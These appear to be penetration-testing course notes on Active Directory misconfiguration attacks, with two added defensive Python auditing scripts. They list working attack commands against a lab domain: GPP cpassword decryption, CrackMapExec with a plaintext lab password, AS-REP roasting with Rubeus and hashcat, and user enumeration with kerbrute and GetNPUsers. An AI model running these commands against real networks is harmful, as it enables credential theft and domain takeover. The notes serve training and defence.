23. Miscellaneous Misconfigurations

Key Concepts:

  • Membership in the Exchange Windows Permissions group, if misconfigured, can be leveraged to obtain DCSync privileges.

  • The Organization Management group grants extensive control over Exchange and mailboxes.

  • Compromised Exchange servers are prime targets for credential dumping.

  • PrivExchange: Exploiting the PushSubscription feature for NTLM relay and potential domain compromise.


Printer Bug (MS-RPRN Protocol Flaw)

Key Concepts:

  • The MS-RPRN protocol flaw allows the Print Spooler service to be coerced into authenticating to another host, enabling NTLM relay.

  • This can lead to DCSync privileges or Resource-Based Constrained Delegation (RBCD) exploitation.

  • It can be used to attack across forest trusts.

Commands:

Import-Module .\SecurityAssessment.ps1
Get-SpoolStatus -ComputerName ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL

MS14-068 (Kerberos PAC Forging)

Key Concepts:

  • This vulnerability allows for forging Kerberos PACs to elevate privileges.

  • Patching is the only effective defense.


Sniffing LDAP Credentials

Key Concepts:

  • Exploiting weak configurations in applications and printers that store LDAP credentials.

  • Using netcat as a listener to capture the credentials the device sends when its LDAP server setting points at the listener.


Enumerating DNS Records (adidnsdump)

Key Concepts:

  • Using adidnsdump to enumerate AD-integrated DNS records, including entries that are not listed by name (the -r option resolves them with DNS queries).

Commands:

adidnsdump -u inlanefreight\\forend ldap://172.16.5.5
adidnsdump -u inlanefreight\\forend ldap://172.16.5.5 -r

Other Misconfigurations

Password in Description Field:

Get-DomainUser * | Select-Object samaccountname,description | Where-Object {$_.Description -ne $null}

PASSWD_NOTREQD Field:

Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol

Credentials in SMB Shares and SYSVOL Scripts:

ls \\academy-ea-dc01\SYSVOL\INLANEFREIGHT.LOCAL\scripts
cat \\academy-ea-dc01\SYSVOL\INLANEFREIGHT.LOCAL\scripts\reset_local_admin_pass.vbs

Group Policy Preferences (GPP) Passwords

Key Concepts:

  • Exploiting cpassword values in GPP XML files.

  • Using gpp-decrypt and CrackMapExec.

Commands:

gpp-decrypt VPe/o9YRyz2cksnYRbNeQj35w9KxQ5ttbvtRaAVqxaE
crackmapexec smb -L | grep gpp
crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M gpp_autologin
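As an added example (not part of the original notes, and not the code of gpp-decrypt or CrackMapExec), the following script performs the defender-side counterpart of the commands above: it scans Group Policy Preference XML for leftover cpassword attributes so they can be removed. The Groups.xml content is constructed to mimic the real file layout; the policy path, the user names and the cpassword blob are placeholders, and scan_sysvol is an assumed helper for walking a mounted SYSVOL Policies tree.

```python
# Added example: find cpassword attributes left behind in Group Policy Preference XML.
# Detection only; the goal is to locate and remove these entries from SYSVOL.
import xml.etree.ElementTree as ET
from pathlib import Path

# GPP item types store the account name under different attribute names.
ACCOUNT_ATTRIBUTES = ("userName", "runAs", "accountName", "username")

# Constructed sample Groups.xml: one entry with an embedded cpassword, one clean entry.
# The uid values and the cpassword blob are placeholders, not real data.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator (built-in)"
        image="2" changed="2020-01-01 10:00:00" uid="{PLACEHOLDER-UID-1}">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="PLACEHOLDER-CPASSWORD-BLOB" changeLogon="0" noChange="1"
                neverExpires="1" acctDisabled="0" userName="Administrator (built-in)"/>
  </User>
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="helpdesk" image="2"
        changed="2020-01-01 10:05:00" uid="{PLACEHOLDER-UID-2}">
    <Properties action="U" newName="" fullName="" description="" changeLogon="0"
                noChange="1" neverExpires="1" acctDisabled="0" userName="helpdesk"/>
  </User>
</Groups>
"""


def scan_gpp_xml(xml_text: str, source: str = "<memory>") -> list[dict]:
    """Return one finding per XML element that carries a cpassword attribute.

    An empty cpassword is still reported but flagged, since it leaks nothing
    yet shows the item was once configured with a stored credential.
    """
    findings = []
    root = ET.fromstring(xml_text.encode("utf-8"))
    for elem in root.iter():
        if "cpassword" not in elem.attrib:
            continue
        account = next((elem.attrib[a] for a in ACCOUNT_ATTRIBUTES if a in elem.attrib), "")
        findings.append({
            "source": source,
            "element": elem.tag,
            "account": account,
            "empty": elem.attrib["cpassword"] == "",
        })
    return findings


def scan_sysvol(policies_root: Path) -> list[dict]:
    """Assumed helper: walk a mounted Policies tree and scan every XML file in it."""
    results = []
    for xml_file in policies_root.rglob("*.xml"):
        try:
            text = xml_file.read_text(encoding="utf-8-sig")
            results.extend(scan_gpp_xml(text, str(xml_file)))
        except (ET.ParseError, OSError):
            continue  # not a well-formed preference file or unreadable; skip it
    return results


if __name__ == "__main__":
    for finding in scan_gpp_xml(SAMPLE_GROUPS_XML, "Groups.xml"):
        state = "empty cpassword" if finding["empty"] else "cpassword present"
        print(f"{finding['source']}: <{finding['element']}> account={finding['account']!r} ({state})")
```

Run against a mounted SYSVOL copy with scan_sysvol(Path(r"\\dc\SYSVOL\domain\Policies")); every reported item should be deleted from the GPO and the affected account's password rotated, because the cpassword AES key is public and anyone who can read SYSVOL can recover the plaintext.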

AS-REP Roasting

Key Concepts:

  • Exploiting accounts with "Do not require Kerberos pre-authentication" enabled.

  • Using Rubeus, Hashcat, and Kerbrute.

Commands:

Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl
./Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat

hashcat -m 18200 ilfreight_asrep /usr/share/wordlists/rockyou.txt

kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt

GetNPUsers.py INLANEFREIGHT.LOCAL/ -dc-ip 172.16.5.5 -no-pass -usersfile valid_ad_users
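As an added example (not part of the original notes and not PowerView or Rubeus code), the script below audits user objects for the account-level weaknesses covered in the "Other Misconfigurations" and "AS-REP Roasting" sections: the PASSWD_NOTREQD and DONT_REQ_PREAUTH userAccountControl bits and credentials left in the description attribute. It goes slightly beyond the PowerView one-liners by decoding the raw userAccountControl integer and by filtering descriptions for password-like keywords instead of listing every non-empty description. The user records are constructed; in practice they would come from an LDAP query returning sAMAccountName, userAccountControl and description.

```python
# Added example: flag accounts with risky userAccountControl bits or a
# password hint in the description attribute. Sample records are constructed.

# Documented userAccountControl bit values (Microsoft ADS_USER_FLAG_ENUM).
UAC_FLAGS = {
    "ACCOUNTDISABLE": 0x0002,
    "PASSWD_NOTREQD": 0x0020,
    "NORMAL_ACCOUNT": 0x0200,
    "DONT_EXPIRE_PASSWORD": 0x10000,
    "DONT_REQ_PREAUTH": 0x400000,
}

# Bits that are a misconfiguration on their own: no password required,
# and Kerberos pre-authentication disabled (AS-REP roastable).
RISKY_FLAGS = ("PASSWD_NOTREQD", "DONT_REQ_PREAUTH")

# Substrings that suggest a credential was stored in the description field.
PASSWORD_HINTS = ("password", "passwd", "pwd", "pass:")


def decode_uac(value: int) -> list[str]:
    """Return the names of every known bit set in a userAccountControl value."""
    return [name for name, bit in UAC_FLAGS.items() if value & bit]


def audit_user(user: dict) -> list[str]:
    """Return the list of finding labels for one user record (empty if clean)."""
    findings = [
        flag for flag in decode_uac(int(user.get("userAccountControl", 0)))
        if flag in RISKY_FLAGS
    ]
    description = (user.get("description") or "").lower()
    if any(hint in description for hint in PASSWORD_HINTS):
        findings.append("DESCRIPTION_CONTAINS_PASSWORD_HINT")
    return findings


def audit_users(users: list[dict]) -> dict[str, list[str]]:
    """Audit every record and return only the users that have findings."""
    report = {}
    for user in users:
        findings = audit_user(user)
        if findings:
            report[user["sAMAccountName"]] = findings
    return report


# Constructed sample records; the account names and description are hypothetical.
SAMPLE_USERS = [
    {"sAMAccountName": "mmorgan", "userAccountControl": 0x200 | 0x400000, "description": None},
    {"sAMAccountName": "svc_backup", "userAccountControl": 0x200 | 0x20 | 0x10000,
     "description": "Backup service account. Password: Backup2020!"},
    {"sAMAccountName": "jsmith", "userAccountControl": 0x200, "description": "Sales, London office"},
]

if __name__ == "__main__":
    for name, findings in audit_users(SAMPLE_USERS).items():
        print(f"{name}: {', '.join(findings)}")
```

Each finding maps to a direct remediation: clear the PASSWD_NOTREQD bit and set a password, re-enable pre-authentication (or move the account to a long random password if it must stay roastable), and scrub the description attribute before rotating the exposed credential.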

Group Policy Object (GPO) Abuse

Key Concepts:

  • Exploiting misconfigured GPO permissions for privilege escalation and persistence.

  • Abusing GPOs to:

    • Add local admin accounts

    • Create scheduled tasks

    • Grant additional privileges to users
